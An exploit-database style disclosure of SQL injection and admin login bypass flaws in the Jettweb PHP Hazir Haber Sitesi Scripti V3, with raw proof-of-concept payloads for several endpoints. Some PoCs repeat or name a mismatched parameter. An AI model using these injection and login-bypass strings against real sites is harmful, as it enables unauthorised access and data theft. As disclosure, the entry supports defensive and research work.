Jettweb PHP Hazir Haber Sitesi Scripti V3 - Multiple Vulnerabilities

vendor:

PHP Hazir Haber Sitesi Scripti

by:

Ahmet Ümit BAYRAM

7.5

CVSS

HIGH

SQL Injection, Authentication Bypass

89, 287

CWE

Product Name: PHP Hazir Haber Sitesi Scripti

Affected Version From: V3

Affected Version To: V3

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Kali Linux

2019

Jettweb PHP Hazir Haber Sitesi Scripti V3 – Multiple Vulnerabilities

Jettweb PHP Hazir Haber Sitesi Scripti V3 is prone to multiple vulnerabilities, including SQL injection and authentication bypass. An attacker can exploit these vulnerabilities to gain access to sensitive information, inject malicious code into the application, and execute arbitrary commands in the context of the application. The SQL injection vulnerabilities exist in the 'fonksiyonlar.php' script, the 'kelimeara' script, and the 'datagetir.php' script. The authentication bypass vulnerability exists in the 'login.php' script.

Mitigation:

Developers should never rely on client-side input validation. Input validation should always be performed on the server side. Developers should also sanitize all user-supplied input to prevent malicious code from being injected into the application. Additionally, developers should ensure that the application is not vulnerable to authentication bypass.

Source

Exploit-DB raw data:

# Exploit Title: Jettweb PHP Hazır Haber Sitesi Scripti V3 - Multiple Vulnerabilities
# Date: 25.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://jettweb.net/u-16-php-hazir-haber-sitesi-scripti-v3.html
# Demo Site: http://haberv3.proemlaksitesi.net
# Version: V3
# Tested on: Kali Linux
# CVE: N/A

----- PoC 1: SQLi -----

Request: http://localhost/[PATH]/fonksiyonlar.php
Vulnerable Parameter: videoid (GET)
Payload: fgit=videoyorumlar&videoid=1' UNION ALL SELECT
NULL,NULL,NULL,NULL,NULL,CONCAT(CONCAT('qvzqq','LtSqAGUtJGxRGVrFfaFBRmvYYHCMdjkRYqQBbQfc'),'qqkjq'),NULL,NULL--
Kcmb

----- PoC 2: SQLi -----

Request: http://localhost/[PATH]/kelimeara
Vulnerable Parameter: kelime (POST)
Payload: fgit=videoyorumlar&videoid=1' UNION ALL SELECT
NULL,NULL,NULL,NULL,NULL,CONCAT(CONCAT('qvzqq','LtSqAGUtJGxRGVrFfaFBRmvYYHCMdjkRYqQBbQfc'),'qqkjq'),NULL,NULL--
Kcmb

----- PoC 3: SQLi -----

Request: http://localhost/[PATH]/datagetir.php
Vulnerable Parameter: q (GET)
Payload:
datagetir.php?deger=undefined&dog=undefined&komut=ilcegetir&q=0'XOR(if(now()=sysdate()%2Csleep(0)%2C0))XOR'Z&son=undefined


----- PoC 4: SQLi -----

Request: http://localhost/[PATH]kelimeara
Vulnerable Parameter: kelime (POST)
Payload: fgit=videoyorumlar&videoid=1' UNION ALL SELECT
NULL,NULL,NULL,NULL,NULL,CONCAT(CONCAT('qvzqq','LtSqAGUtJGxRGVrFfaFBRmvYYHCMdjkRYqQBbQfc'),'qqkjq'),NULL,NULL--
Kcmb


----- PoC 5: Authentication Bypass -----

Administration Panel: http://localhost/[PATH]/yonetim/login.php
Username: '=' 'or'
Password: '=' 'or'